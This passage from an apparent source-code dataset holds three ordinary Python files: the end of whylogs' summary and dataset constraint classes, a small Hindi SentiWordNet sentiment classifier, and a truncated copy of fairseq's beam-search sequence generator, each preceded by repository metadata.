Name of field in NumberSummary that will be compared against either a second field or a static value.
op : whylogs.proto.Op (required)
Enumeration of binary comparison operator applied between summary values.
Enum values are mapped to operators like '==', '<', and '<=', etc.
value : (one-of)
Static value to be compared against summary field specified in `first_field`.
Only one of `value` or `second_field` should be supplied.
second_field : (one-of)
Name of second field in NumberSummary to be compared against summary field specified in `first_field`.
Only one of `value` or `second_field` should be supplied.
name : str
Name of the constraint used for reporting
verbose : bool
If true, log every application of this constraint that fails.
Useful to identify specific streaming values that fail the constraint.
"""
def __init__(
self,
first_field: str,
op: Op,
value=None,
second_field: str = None,
name: str = None,
verbose=False,
):
self._verbose = verbose
self._name = name
self.op = op
self.first_field = first_field
self.second_field = second_field
self.total = 0
self.failures = 0
if value is not None and second_field is None:
# field-value summary comparison
self.value = value
self.func = _summary_funcs1[op](first_field, value)
elif second_field is not None and value is None:
# field-field summary comparison
self.second_field = second_field
self.func = _summary_funcs2[op](first_field, second_field)
else:
raise ValueError("Summary constraint must specify a second value or field name, but not both")
@property
def name(self):
return self._name if self._name is not None else f"summary {self.first_field} {Op.Name(self.op)} {self.value}/{self.second_field}"
def update(self, summ: NumberSummary) -> bool:
self.total += 1
if not self.func(summ):
self.failures += 1
if self._verbose:
logger.info(f"summary constraint {self.name} failed")
@staticmethod
def from_protobuf(msg: SummaryConstraintMsg) -> "SummaryConstraint":
if msg.HasField("value") and not msg.HasField("second_field"):
return SummaryConstraint(
msg.first_field,
msg.op,
value=msg.value,
name=msg.name,
verbose=msg.verbose,
)
elif msg.HasField("second_field") and not msg.HasField("value"):
return SummaryConstraint(
msg.first_field,
msg.op,
second_field=msg.second_field,
name=msg.name,
verbose=msg.verbose,
)
else:
raise ValueError("SummaryConstraintMsg must specify a value or second field name, but not both")
def to_protobuf(self) -> SummaryConstraintMsg:
if self.second_field is None:
msg = SummaryConstraintMsg(
name=self.name,
first_field=self.first_field,
op=self.op,
value=self.value,
verbose=self._verbose,
)
else:
msg = SummaryConstraintMsg(
name=self.name,
first_field=self.first_field,
op=self.op,
second_field=self.second_field,
verbose=self._verbose,
)
return msg
def report(self):
return (self.name, self.total, self.failures)
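# Hedged usage sketch (added for illustration), mirroring the docstring examples.
# `number_summary` stands for a NumberSummary message; the attribute names used
# below ("min", "mean") are assumed to exist on that message.
#
#   min_lt_6 = SummaryConstraint("min", Op.LT, value=6)
#   min_gt_avg = SummaryConstraint("min", Op.GT, second_field="mean")
#   min_lt_6.update(number_summary)
#   min_gt_avg.update(number_summary)
#   min_lt_6.report()   # -> (name, total, failures)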
class ValueConstraints:
def __init__(self, constraints: List[ValueConstraint] = []):
self.constraints = constraints
@staticmethod
def from_protobuf(msg: ValueConstraintMsgs) -> "ValueConstraints":
v = [ValueConstraint.from_protobuf(c) for c in msg.constraints]
if len(v) > 0:
return ValueConstraints(v)
return None
def to_protobuf(self) -> ValueConstraintMsgs:
v = [c.to_protobuf() for c in self.constraints]
if len(v) > 0:
vcmsg = ValueConstraintMsgs()
vcmsg.constraints.extend(v)
return vcmsg
return None
def update(self, v):
for c in self.constraints:
c.update(v)
def report(self) -> List[tuple]:
v = [c.report() for c in self.constraints]
if len(v) > 0:
return v
return None
class SummaryConstraints:
def __init__(self, constraints: List[SummaryConstraint]):
self.constraints = constraints
@staticmethod
def from_protobuf(msg: SummaryConstraintMsgs) -> "SummaryConstraints":
v = [SummaryConstraint.from_protobuf(c) for c in msg.constraints]
if len(v) > 0:
return SummaryConstraints(v)
return None
def to_protobuf(self) -> SummaryConstraintMsgs:
v = [c.to_protobuf() for c in self.constraints]
if len(v) > 0:
scmsg = SummaryConstraintMsgs()
scmsg.constraints.extend(v)
return scmsg
return None
def update(self, v):
for c in self.constraints:
c.update(v)
def report(self) -> List[tuple]:
v = [c.report() for c in self.constraints]
if len(v) > 0:
return v
return None
class DatasetConstraints:
def __init__(
self,
props: DatasetProperties,
value_constraints: Optional[Mapping[str, ValueConstraints]] = None,
summary_constraints: Optional[Mapping[str, SummaryConstraints]] = None,
):
self.dataset_properties = props
# repackage lists of constraints if necessary
if value_constraints is None:
value_constraints = dict()
for k, v in value_constraints.items():
if isinstance(v, list):
value_constraints[k] = ValueConstraints(v)
self.value_constraint_map = value_constraints
if summary_constraints is None:
summary_constraints = dict()
for k, v in summary_constraints.items():
if isinstance(v, list):
summary_constraints[k] = SummaryConstraints(v)
self.summary_constraint_map = summary_constraints
def __getitem__(self, key):
if key in self.value_constraint_map:
return self.value_constraint_map[key]
return None
@staticmethod
def from_protobuf(msg: DatasetConstraintMsg) -> "DatasetConstraints":
vm = dict([(k, ValueConstraints.from_protobuf(v)) for k, v in msg.value_constraints.items()])
sm = dict([(k, SummaryConstraints.from_protobuf(v)) for k, v in msg.summary_constraints.items()])
return DatasetConstraints(msg.properties, vm, sm)
@staticmethod
def from_json(data: str) -> "DatasetConstraints":
msg = Parse(data, DatasetConstraintMsg())
return DatasetConstraints.from_protobuf(msg)
def to_protobuf(self) -> DatasetConstraintMsg:
# construct tuple for each column, (name, [constraints,...])
# turn that into a map indexed by column name
vm = dict([(k, v.to_protobuf()) for k, v in self.value_constraint_map.items()])
sm = dict([(k, s.to_protobuf()) for k, s in self.summary_constraint_map.items()])
return DatasetConstraintMsg(
properties=self.dataset_properties,
value_constraints=vm,
summary_constraints=sm,
)
def to_json(self) -> str:
return message_to_json(self.to_protobuf())
def report(self):
l1 = [(k, v.report()) for k, v in self.value_constraint_map.items()]
l2 = [(k, s.report()) for k, s in self.summary_constraint_map.items()]
return l1 + l2
| 36.252033 | 138 | 0.614488 |
d7587a7b5a88339a0cd5d11099e6abfd34795602 | 2,499 | py | Python | ResourceBasedSentimentClassification.py | nishii-singh/Sentiment-analysis | efd75687ccf79e8aac44328c0cb999a9c14000c4 | [
"Apache-2.0"
] | null | null | null | ResourceBasedSentimentClassification.py | nishii-singh/Sentiment-analysis | efd75687ccf79e8aac44328c0cb999a9c14000c4 | [
"Apache-2.0"
] | null | null | null | ResourceBasedSentimentClassification.py | nishii-singh/Sentiment-analysis | efd75687ccf79e8aac44328c0cb999a9c14000c4 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
# NISHI SINGH
# HOOMACL201900025
# MA COMPUTATIONAL LINGUISTICS
# This module performs resource-based sentiment classification using the Hindi SentiWordNet.
import pandas as pd
import codecs
from nltk.tokenize import word_tokenize
import sklearn.metrics
import re
fields = ['POS_TAG', 'ID', 'POS', 'NEG', 'LIST_OF_WORDS']
# Build a dictionary with an entry for every word: each key is a word from the
# synset list and its value is a (positive score, negative score) tuple.
def sentiment(text):
print(text)
words = word_tokenize(text)
votes = []
pos_polarity = 0
neg_polarity = 0
    # only adjectives (a), verbs (v), adverbs (r) and nouns (n) are considered
allowed_words = ['a','v','r','n']
for word in words:
if word in words_dict:
#if word in dictionary, it picks up the positive and negative score of the word
pos, neg = words_dict[word]
print(word,pos, neg)
if pos > neg:
pos_polarity += pos
votes.append(1)
elif neg > pos:
neg_polarity += neg
votes.append(0)
#calculating the no. of positive and negative words in total in a review to give class labels
pos_votes = votes.count(1)
neg_votes = votes.count(0)
if pos_votes > neg_votes:
return 1
elif neg_votes > pos_votes:
return -1
else:
        if pos_polarity > neg_polarity:
            return 1
        elif neg_polarity > pos_polarity:
            return -1
else:
return 0
words_dict = {}
# Load the Hindi SentiWordNet file and build the word -> (positive, negative) score dictionary.
data = pd.read_csv("HindiSentiWordnet.txt", delimiter=' ')
for i in data.index:
# print (data[fields[0]][i], data[fields[1]][i], data[fields[2]][i], data[fields[3]][i], data[fields[4]][i])
words = data[fields[4]][i].split(',')
for word in words:
words_dict[word] = (data[fields[2]][i], data[fields[3]][i])
#print(word,data[fields[0]][i], data[fields[2]][i], data[fields[3]][i])
# for x in words_dict:
# print(x)
# for y in words_dict[x]:
# print(y)
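# Illustrative note (added): after the loop above, words_dict maps every word in
# LIST_OF_WORDS to its (positive score, negative score) pair. For a hypothetical
# row "a 00001 0.25 0.125 word1,word2" this gives
# words_dict['word1'] == words_dict['word2'] == (0.25, 0.125).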
c='Y'
while c=='Y' or c=='y':
text=input('Enter a Hindi news article: ')
t=sentiment(text)
if t==1:
print("Positive")
elif t==-1 :
print("Negative")
else:
print("Neutral")
c=input('To Continue press Y: ')
#print(len(actual_y))
#print(accuracy_score(actual_y, pred_y) * 100)
#print('F-measure: ',f1_score(actual_y,pred_y))
| 30.108434 | 112 | 0.615046 |
7d323d85e7c9ca9325c77f12c3a95d259459ede7 | 39,780 | py | Python | fairseq/sequence_generator.py | dumpmemory/fairseq | c39fefccb013bfb8b1dc6cbbfabe1fd7ad4344a7 | [
"MIT"
] | 1 | 2021-11-10T06:17:44.000Z | 2021-11-10T06:17:44.000Z | fairseq/sequence_generator.py | EricWangCN/fairseq | 321589988bc05038f927cf5e887e8c60f46d9c2a | [
"MIT"
] | null | null | null | fairseq/sequence_generator.py | EricWangCN/fairseq | 321589988bc05038f927cf5e887e8c60f46d9c2a | [
"MIT"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import math
import sys
from typing import Dict, List, Optional
import torch
import torch.nn as nn
from torch import Tensor
from fairseq import search, utils
from fairseq.data import data_utils
from fairseq.models import FairseqIncrementalDecoder
from fairseq.ngram_repeat_block import NGramRepeatBlock
class SequenceGenerator(nn.Module):
def __init__(
self,
models,
tgt_dict,
beam_size=1,
max_len_a=0,
max_len_b=200,
max_len=0,
min_len=1,
normalize_scores=True,
len_penalty=1.0,
unk_penalty=0.0,
temperature=1.0,
match_source_len=False,
no_repeat_ngram_size=0,
search_strategy=None,
eos=None,
symbols_to_strip_from_output=None,
lm_model=None,
lm_weight=1.0,
):
"""Generates translations of a given source sentence.
Args:
models (List[~fairseq.models.FairseqModel]): ensemble of models,
currently support fairseq.models.TransformerModel for scripting
beam_size (int, optional): beam width (default: 1)
max_len_a/b (int, optional): generate sequences of maximum length
ax + b, where x is the source length
max_len (int, optional): the maximum length of the generated output
(not including end-of-sentence)
min_len (int, optional): the minimum length of the generated output
(not including end-of-sentence)
normalize_scores (bool, optional): normalize scores by the length
of the output (default: True)
len_penalty (float, optional): length penalty, where <1.0 favors
shorter, >1.0 favors longer sentences (default: 1.0)
unk_penalty (float, optional): unknown word penalty, where <0
produces more unks, >0 produces fewer (default: 0.0)
temperature (float, optional): temperature, where values
>1.0 produce more uniform samples and values <1.0 produce
sharper samples (default: 1.0)
match_source_len (bool, optional): outputs should match the source
length (default: False)
"""
super().__init__()
if isinstance(models, EnsembleModel):
self.model = models
else:
self.model = EnsembleModel(models)
self.tgt_dict = tgt_dict
self.pad = tgt_dict.pad()
self.unk = tgt_dict.unk()
self.eos = tgt_dict.eos() if eos is None else eos
self.symbols_to_strip_from_output = (
symbols_to_strip_from_output.union({self.eos})
if symbols_to_strip_from_output is not None
else {self.eos}
)
self.vocab_size = len(tgt_dict)
self.beam_size = beam_size
# the max beam size is the dictionary size - 1, since we never select pad
self.beam_size = min(beam_size, self.vocab_size - 1)
self.model.set_decoder_beam_size(self.beam_size)
self.max_len_a = max_len_a
self.max_len_b = max_len_b
self.min_len = min_len
self.max_len = max_len or self.model.max_decoder_positions()
self.normalize_scores = normalize_scores
self.len_penalty = len_penalty
self.unk_penalty = unk_penalty
self.temperature = temperature
self.match_source_len = match_source_len
if no_repeat_ngram_size > 0:
self.repeat_ngram_blocker = NGramRepeatBlock(no_repeat_ngram_size)
else:
self.repeat_ngram_blocker = None
assert temperature > 0, "--temperature must be greater than 0"
self.search = (
search.BeamSearch(tgt_dict) if search_strategy is None else search_strategy
)
# We only need to set src_lengths in LengthConstrainedBeamSearch.
# As a module attribute, setting it would break in multithread
# settings when the model is shared.
self.should_set_src_lengths = (
hasattr(self.search, "needs_src_lengths") and self.search.needs_src_lengths
)
self.model.eval()
self.lm_model = lm_model
self.lm_weight = lm_weight
if self.lm_model is not None:
self.lm_model.eval()
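    # Hedged usage sketch (comment added for illustration; not in the original
    # fairseq source). A generator is typically built from an ensemble of trained
    # models plus the target dictionary, then called on a prepared batch:
    #
    #   generator = SequenceGenerator(models, tgt_dict, beam_size=5)
    #   hypos = generator.generate(models, sample)
    #   best_tokens = hypos[0][0]["tokens"]   # top-scoring hypothesis, first sentence
    #
    # `models`, `tgt_dict` and `sample` are assumed to come from a fairseq task
    # and dataloader; their construction is outside this file.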
def cuda(self):
self.model.cuda()
return self
@torch.no_grad()
def forward(
self,
sample: Dict[str, Dict[str, Tensor]],
prefix_tokens: Optional[Tensor] = None,
bos_token: Optional[int] = None,
):
"""Generate a batch of translations.
Args:
sample (dict): batch
prefix_tokens (torch.LongTensor, optional): force decoder to begin
with these tokens
bos_token (int, optional): beginning of sentence token
(default: self.eos)
"""
return self._generate(sample, prefix_tokens, bos_token=bos_token)
# TODO(myleott): unused, deprecate after pytorch-translate migration
def generate_batched_itr(self, data_itr, beam_size=None, cuda=False, timer=None):
"""Iterate over a batched dataset and yield individual translations.
Args:
cuda (bool, optional): use GPU for generation
timer (StopwatchMeter, optional): time generations
"""
for sample in data_itr:
s = utils.move_to_cuda(sample) if cuda else sample
if "net_input" not in s:
continue
input = s["net_input"]
# model.forward normally channels prev_output_tokens into the decoder
# separately, but SequenceGenerator directly calls model.encoder
encoder_input = {
k: v for k, v in input.items() if k != "prev_output_tokens"
}
if timer is not None:
timer.start()
with torch.no_grad():
hypos = self.generate(encoder_input)
if timer is not None:
timer.stop(sum(len(h[0]["tokens"]) for h in hypos))
for i, id in enumerate(s["id"].data):
# remove padding
src = utils.strip_pad(input["src_tokens"].data[i, :], self.pad)
ref = (
utils.strip_pad(s["target"].data[i, :], self.pad)
if s["target"] is not None
else None
)
yield id, src, ref, hypos[i]
@torch.no_grad()
def generate(
self, models, sample: Dict[str, Dict[str, Tensor]], **kwargs
) -> List[List[Dict[str, Tensor]]]:
"""Generate translations. Match the api of other fairseq generators.
Args:
models (List[~fairseq.models.FairseqModel]): ensemble of models
sample (dict): batch
prefix_tokens (torch.LongTensor, optional): force decoder to begin
with these tokens
constraints (torch.LongTensor, optional): force decoder to include
the list of constraints
bos_token (int, optional): beginning of sentence token
(default: self.eos)
"""
return self._generate(sample, **kwargs)
def _generate(
self,
sample: Dict[str, Dict[str, Tensor]],
prefix_tokens: Optional[Tensor] = None,
constraints: Optional[Tensor] = None,
bos_token: Optional[int] = None,
):
incremental_states = torch.jit.annotate(
List[Dict[str, Dict[str, Optional[Tensor]]]],
[
torch.jit.annotate(Dict[str, Dict[str, Optional[Tensor]]], {})
for i in range(self.model.models_size)
],
)
net_input = sample["net_input"]
if "src_tokens" in net_input:
src_tokens = net_input["src_tokens"]
# length of the source text being the character length except EndOfSentence and pad
src_lengths = (
(src_tokens.ne(self.eos) & src_tokens.ne(self.pad)).long().sum(dim=1)
)
elif "source" in net_input:
src_tokens = net_input["source"]
src_lengths = (
net_input["padding_mask"].size(-1) - net_input["padding_mask"].sum(-1)
if net_input["padding_mask"] is not None
else torch.tensor(src_tokens.size(-1)).to(src_tokens)
)
elif "features" in net_input:
src_tokens = net_input["features"]
src_lengths = (
net_input["padding_mask"].size(-1) - net_input["padding_mask"].sum(-1)
if net_input["padding_mask"] is not None
else torch.tensor(src_tokens.size(-1)).to(src_tokens)
)
else:
raise Exception(
"expected src_tokens or source in net input. input keys: "
+ str(net_input.keys())
)
# bsz: total number of sentences in beam
# Note that src_tokens may have more than 2 dimensions (i.e. audio features)
bsz, src_len = src_tokens.size()[:2]
beam_size = self.beam_size
if constraints is not None and not self.search.supports_constraints:
raise NotImplementedError(
"Target-side constraints were provided, but search method doesn't support them"
)
# Initialize constraints, when active
self.search.init_constraints(constraints, beam_size)
max_len: int = -1
if self.match_source_len:
max_len = src_lengths.max().item()
else:
max_len = min(
int(self.max_len_a * src_len + self.max_len_b),
self.max_len - 1,
)
assert (
self.min_len <= max_len
), "min_len cannot be larger than max_len, please adjust these!"
# compute the encoder output for each beam
with torch.autograd.profiler.record_function("EnsembleModel: forward_encoder"):
encoder_outs = self.model.forward_encoder(net_input)
# placeholder of indices for bsz * beam_size to hold tokens and accumulative scores
new_order = torch.arange(bsz).view(-1, 1).repeat(1, beam_size).view(-1)
new_order = new_order.to(src_tokens.device).long()
encoder_outs = self.model.reorder_encoder_out(encoder_outs, new_order)
# ensure encoder_outs is a List.
assert encoder_outs is not None
# initialize buffers
scores = (
torch.zeros(bsz * beam_size, max_len + 1).to(src_tokens).float()
) # +1 for eos; pad is never chosen for scoring
tokens = (
torch.zeros(bsz * beam_size, max_len + 2)
.to(src_tokens)
.long()
.fill_(self.pad)
) # +2 for eos and pad
tokens[:, 0] = self.eos if bos_token is None else bos_token
attn: Optional[Tensor] = None
# A list that indicates candidates that should be ignored.
# For example, suppose we're sampling and have already finalized 2/5
# samples. Then cands_to_ignore would mark 2 positions as being ignored,
# so that we only finalize the remaining 3 samples.
cands_to_ignore = (
torch.zeros(bsz, beam_size).to(src_tokens).eq(-1)
) # forward and backward-compatible False mask
# list of completed sentences
finalized = torch.jit.annotate(
List[List[Dict[str, Tensor]]],
[torch.jit.annotate(List[Dict[str, Tensor]], []) for i in range(bsz)],
        ) # contains lists of dictionaries of information about the hypothesis being finalized at each step
# a boolean array indicating if the sentence at the index is finished or not
finished = [False for i in range(bsz)]
num_remaining_sent = bsz # number of sentences remaining
# number of candidate hypos per step
cand_size = 2 * beam_size # 2 x beam size in case half are EOS
# offset arrays for converting between different indexing schemes
bbsz_offsets = (
(torch.arange(0, bsz) * beam_size)
.unsqueeze(1)
.type_as(tokens)
.to(src_tokens.device)
)
cand_offsets = torch.arange(0, cand_size).type_as(tokens).to(src_tokens.device)
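        # Worked example (comment added for clarity): with bsz = 2 sentences and
        # beam_size = 3,
        #   new_order    = [0, 0, 0, 1, 1, 1]   (each sentence repeated once per beam)
        #   bbsz_offsets = [[0], [3]]           (row offset into the bsz * beam_size axis)
        #   cand_offsets = [0, 1, 2, 3, 4, 5]   (cand_size = 2 * beam_size)
        # so candidate beam b of sentence s maps to flat index b + bbsz_offsets[s].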
reorder_state: Optional[Tensor] = None
batch_idxs: Optional[Tensor] = None
original_batch_idxs: Optional[Tensor] = None
if "id" in sample and isinstance(sample["id"], Tensor):
original_batch_idxs = sample["id"]
else:
original_batch_idxs = torch.arange(0, bsz).type_as(tokens)
for step in range(max_len + 1): # one extra step for EOS marker
# reorder decoder internal states based on the prev choice of beams
if reorder_state is not None:
if batch_idxs is not None:
# update beam indices to take into account removed sentences
corr = batch_idxs - torch.arange(batch_idxs.numel()).type_as(
batch_idxs
)
reorder_state.view(-1, beam_size).add_(
corr.unsqueeze(-1) * beam_size
)
original_batch_idxs = original_batch_idxs[batch_idxs]
self.model.reorder_incremental_state(incremental_states, reorder_state)
encoder_outs = self.model.reorder_encoder_out(
encoder_outs, reorder_state
)
with torch.autograd.profiler.record_function(
"EnsembleModel: forward_decoder"
):
lprobs, avg_attn_scores = self.model.forward_decoder(
tokens[:, : step + 1],
encoder_outs,
incremental_states,
self.temperature,
)
if self.lm_model is not None:
lm_out = self.lm_model(tokens[:, : step + 1])
probs = self.lm_model.get_normalized_probs(
lm_out, log_probs=True, sample=None
)
probs = probs[:, -1, :] * self.lm_weight
lprobs += probs
lprobs[lprobs != lprobs] = torch.tensor(-math.inf).to(lprobs)
lprobs[:, self.pad] = -math.inf # never select pad
lprobs[:, self.unk] -= self.unk_penalty # apply unk penalty
# handle max length constraint
if step >= max_len:
lprobs[:, : self.eos] = -math.inf
lprobs[:, self.eos + 1 :] = -math.inf
# handle prefix tokens (possibly with different lengths)
if (
prefix_tokens is not None
and step < prefix_tokens.size(1)
and step < max_len
):
lprobs, tokens, scores = self._prefix_tokens(
step, lprobs, scores, tokens, prefix_tokens, beam_size
)
elif step < self.min_len:
# minimum length constraint (does not apply if using prefix_tokens)
lprobs[:, self.eos] = -math.inf
# Record attention scores, only support avg_attn_scores is a Tensor
if avg_attn_scores is not None:
if attn is None:
attn = torch.empty(
bsz * beam_size, avg_attn_scores.size(1), max_len + 2
).to(scores)
attn[:, :, step + 1].copy_(avg_attn_scores)
scores = scores.type_as(lprobs)
eos_bbsz_idx = torch.empty(0).to(
tokens
) # indices of hypothesis ending with eos (finished sentences)
eos_scores = torch.empty(0).to(
scores
) # scores of hypothesis ending with eos (finished sentences)
if self.should_set_src_lengths:
self.search.set_src_lengths(src_lengths)
if self.repeat_ngram_blocker is not None:
lprobs = self.repeat_ngram_blocker(tokens, lprobs, bsz, beam_size, step)
# Shape: (batch, cand_size)
cand_scores, cand_indices, cand_beams = self.search.step(
step,
lprobs.view(bsz, -1, self.vocab_size),
scores.view(bsz, beam_size, -1)[:, :, :step],
tokens[:, : step + 1],
original_batch_idxs,
)
# cand_bbsz_idx contains beam indices for the top candidate
# hypotheses, with a range of values: [0, bsz*beam_size),
# and dimensions: [bsz, cand_size]
cand_bbsz_idx = cand_beams.add(bbsz_offsets)
# finalize hypotheses that end in eos
# Shape of eos_mask: (batch size, beam size)
eos_mask = cand_indices.eq(self.eos) & cand_scores.ne(-math.inf)
eos_mask[:, :beam_size][cands_to_ignore] = torch.tensor(0).to(eos_mask)
# only consider eos when it's among the top beam_size indices
# Now we know what beam item(s) to finish
# Shape: 1d list of absolute-numbered
eos_bbsz_idx = torch.masked_select(
cand_bbsz_idx[:, :beam_size], mask=eos_mask[:, :beam_size]
)
finalized_sents: List[int] = []
if eos_bbsz_idx.numel() > 0:
eos_scores = torch.masked_select(
cand_scores[:, :beam_size], mask=eos_mask[:, :beam_size]
)
finalized_sents = self.finalize_hypos(
step,
eos_bbsz_idx,
eos_scores,
tokens,
scores,
finalized,
finished,
beam_size,
attn,
src_lengths,
max_len,
)
num_remaining_sent -= len(finalized_sents)
assert num_remaining_sent >= 0
if num_remaining_sent == 0:
break
if self.search.stop_on_max_len and step >= max_len:
break
            assert step < max_len, f"{step} < {max_len}"
# Remove finalized sentences (ones for which {beam_size}
# finished hypotheses have been generated) from the batch.
if len(finalized_sents) > 0:
new_bsz = bsz - len(finalized_sents)
# construct batch_idxs which holds indices of batches to keep for the next pass
batch_mask = torch.ones(
bsz, dtype=torch.bool, device=cand_indices.device
)
batch_mask[finalized_sents] = False
# TODO replace `nonzero(as_tuple=False)` after TorchScript supports it
batch_idxs = torch.arange(
bsz, device=cand_indices.device
).masked_select(batch_mask)
# Choose the subset of the hypothesized constraints that will continue
self.search.prune_sentences(batch_idxs)
eos_mask = eos_mask[batch_idxs]
cand_beams = cand_beams[batch_idxs]
bbsz_offsets.resize_(new_bsz, 1)
cand_bbsz_idx = cand_beams.add(bbsz_offsets)
cand_scores = cand_scores[batch_idxs]
cand_indices = cand_indices[batch_idxs]
if prefix_tokens is not None:
prefix_tokens = prefix_tokens[batch_idxs]
src_lengths = src_lengths[batch_idxs]
cands_to_ignore = cands_to_ignore[batch_idxs]
scores = scores.view(bsz, -1)[batch_idxs].view(new_bsz * beam_size, -1)
tokens = tokens.view(bsz, -1)[batch_idxs].view(new_bsz * beam_size, -1)
if attn is not None:
attn = attn.view(bsz, -1)[batch_idxs].view(
new_bsz * beam_size, attn.size(1), -1
)
bsz = new_bsz
else:
batch_idxs = None
# Set active_mask so that values > cand_size indicate eos hypos
# and values < cand_size indicate candidate active hypos.
# After, the min values per row are the top candidate active hypos
# Rewrite the operator since the element wise or is not supported in torchscript.
eos_mask[:, :beam_size] = ~((~cands_to_ignore) & (~eos_mask[:, :beam_size]))
active_mask = torch.add(
eos_mask.type_as(cand_offsets) * cand_size,
cand_offsets[: eos_mask.size(1)],
)
# get the top beam_size active hypotheses, which are just
# the hypos with the smallest values in active_mask.
# {active_hypos} indicates which {beam_size} hypotheses
# from the list of {2 * beam_size} candidates were
# selected. Shapes: (batch size, beam size)
new_cands_to_ignore, active_hypos = torch.topk(
active_mask, k=beam_size, dim=1, largest=False
)
# update cands_to_ignore to ignore any finalized hypos.
cands_to_ignore = new_cands_to_ignore.ge(cand_size)[:, :beam_size]
# Make sure there is at least one active item for each sentence in the batch.
assert (~cands_to_ignore).any(dim=1).all()
# update cands_to_ignore to ignore any finalized hypos
# {active_bbsz_idx} denotes which beam number is continued for each new hypothesis (a beam
# can be selected more than once).
active_bbsz_idx = torch.gather(cand_bbsz_idx, dim=1, index=active_hypos)
active_scores = torch.gather(cand_scores, dim=1, index=active_hypos)
active_bbsz_idx = active_bbsz_idx.view(-1)
active_scores = active_scores.view(-1)
# copy tokens and scores for active hypotheses
# Set the tokens for each beam (can select the same row more than once)
tokens[:, : step + 1] = torch.index_select(
tokens[:, : step + 1], dim=0, index=active_bbsz_idx
)
# Select the next token for each of them
tokens.view(bsz, beam_size, -1)[:, :, step + 1] = torch.gather(
cand_indices, dim=1, index=active_hypos
)
if step > 0:
scores[:, :step] = torch.index_select(
scores[:, :step], dim=0, index=active_bbsz_idx
)
scores.view(bsz, beam_size, -1)[:, :, step] = torch.gather(
cand_scores, dim=1, index=active_hypos
)
# Update constraints based on which candidates were selected for the next beam
self.search.update_constraints(active_hypos)
# copy attention for active hypotheses
if attn is not None:
attn[:, :, : step + 2] = torch.index_select(
attn[:, :, : step + 2], dim=0, index=active_bbsz_idx
)
# reorder incremental state in decoder
reorder_state = active_bbsz_idx
# sort by score descending
for sent in range(len(finalized)):
scores = torch.tensor(
[float(elem["score"].item()) for elem in finalized[sent]]
)
_, sorted_scores_indices = torch.sort(scores, descending=True)
finalized[sent] = [finalized[sent][ssi] for ssi in sorted_scores_indices]
finalized[sent] = torch.jit.annotate(
List[Dict[str, Tensor]], finalized[sent]
)
return finalized
def _prefix_tokens(
self, step: int, lprobs, scores, tokens, prefix_tokens, beam_size: int
):
"""Handle prefix tokens"""
prefix_toks = prefix_tokens[:, step].unsqueeze(-1).repeat(1, beam_size).view(-1)
prefix_lprobs = lprobs.gather(-1, prefix_toks.unsqueeze(-1))
prefix_mask = prefix_toks.ne(self.pad)
lprobs[prefix_mask] = torch.tensor(-math.inf).to(lprobs)
lprobs[prefix_mask] = lprobs[prefix_mask].scatter(
-1, prefix_toks[prefix_mask].unsqueeze(-1), prefix_lprobs[prefix_mask]
)
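        # Net effect: for every beam position with a forced (non-pad) prefix token at
        # this step, all vocabulary entries are set to -inf except the prefix token,
        # which keeps its original log-probability, so the beam must follow the prefix.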
# if prefix includes eos, then we should make sure tokens and
# scores are the same across all beams
eos_mask = prefix_toks.eq(self.eos)
if eos_mask.any():
# validate that the first beam matches the prefix
first_beam = tokens[eos_mask].view(-1, beam_size, tokens.size(-1))[
:, 0, 1 : step + 1
]
eos_mask_batch_dim = eos_mask.view(-1, beam_size)[:, 0]
target_prefix = prefix_tokens[eos_mask_batch_dim][:, :step]
assert (first_beam == target_prefix).all()
# copy tokens, scores and lprobs from the first beam to all beams
tokens = self.replicate_first_beam(tokens, eos_mask_batch_dim, beam_size)
scores = self.replicate_first_beam(scores, eos_mask_batch_dim, beam_size)
lprobs = self.replicate_first_beam(lprobs, eos_mask_batch_dim, beam_size)
return lprobs, tokens, scores
def replicate_first_beam(self, tensor, mask, beam_size: int):
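        # View the flat (batch * beam, L) tensor as (batch, beam, L) and, for every
        # masked sentence, overwrite all beams with beam 0's row before flattening back.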
tensor = tensor.view(-1, beam_size, tensor.size(-1))
tensor[mask] = tensor[mask][:, :1, :]
return tensor.view(-1, tensor.size(-1))
def finalize_hypos(
self,
step: int,
bbsz_idx,
eos_scores,
tokens,
scores,
finalized: List[List[Dict[str, Tensor]]],
finished: List[bool],
beam_size: int,
attn: Optional[Tensor],
src_lengths,
max_len: int,
):
"""Finalize hypothesis, store finalized information in `finalized`, and change `finished` accordingly.
A sentence is finalized when {beam_size} finished items have been collected for it.
Returns number of sentences (not beam items) being finalized.
These will be removed from the batch and not processed further.
Args:
            bbsz_idx (Tensor): indices into the flattened (batch * beam) dimension
                of the hypotheses that just ended with EOS at this step.
            eos_scores (Tensor): cumulative scores of those hypotheses, including
                the EOS token.
        """
assert bbsz_idx.numel() == eos_scores.numel()
# clone relevant token and attention tensors.
# tokens is (batch * beam, max_len). So the index_select
# gets the newly EOS rows, then selects cols 1..{step + 2}
tokens_clone = tokens.index_select(0, bbsz_idx)[
:, 1 : step + 2
] # skip the first index, which is EOS
tokens_clone[:, step] = self.eos
attn_clone = (
attn.index_select(0, bbsz_idx)[:, :, 1 : step + 2]
if attn is not None
else None
)
# compute scores per token position
pos_scores = scores.index_select(0, bbsz_idx)[:, : step + 1]
pos_scores[:, step] = eos_scores
# convert from cumulative to per-position scores
pos_scores[:, 1:] = pos_scores[:, 1:] - pos_scores[:, :-1]
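        # e.g. cumulative scores [-0.5, -1.2, -2.0] become per-token scores
        # [-0.5, -0.7, -0.8] (illustrative values only).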
# normalize sentence-level scores
if self.normalize_scores:
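            # Divide by length ** len_penalty: values > 1.0 favor longer hypotheses,
            # values < 1.0 favor shorter ones.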
eos_scores /= (step + 1) ** self.len_penalty
# cum_unfin records which sentences in the batch are finished.
# It helps match indexing between (a) the original sentences
# in the batch and (b) the current, possibly-reduced set of
# sentences.
cum_unfin: List[int] = []
prev = 0
for f in finished:
if f:
prev += 1
else:
cum_unfin.append(prev)
cum_fin_tensor = torch.tensor(cum_unfin, dtype=torch.int).to(bbsz_idx)
unfin_idx = torch.div(bbsz_idx, beam_size, rounding_mode="trunc")
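        # bbsz_idx is a flat index into the (batch * beam) dimension, so integer
        # division by beam_size recovers the sentence index in the current batch.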
sent = unfin_idx + torch.index_select(cum_fin_tensor, 0, unfin_idx)
        # Pack "{sent}" and "{unfin_idx}" into a single integer per finished beam
        # item, where "unfin_idx" is the index in the current (possibly reduced)
        # list of sentences and "sent" is the index in the original, unreduced
        # batch. This allows finished items to be deduplicated per sentence below.
seen = (sent << 32) + unfin_idx
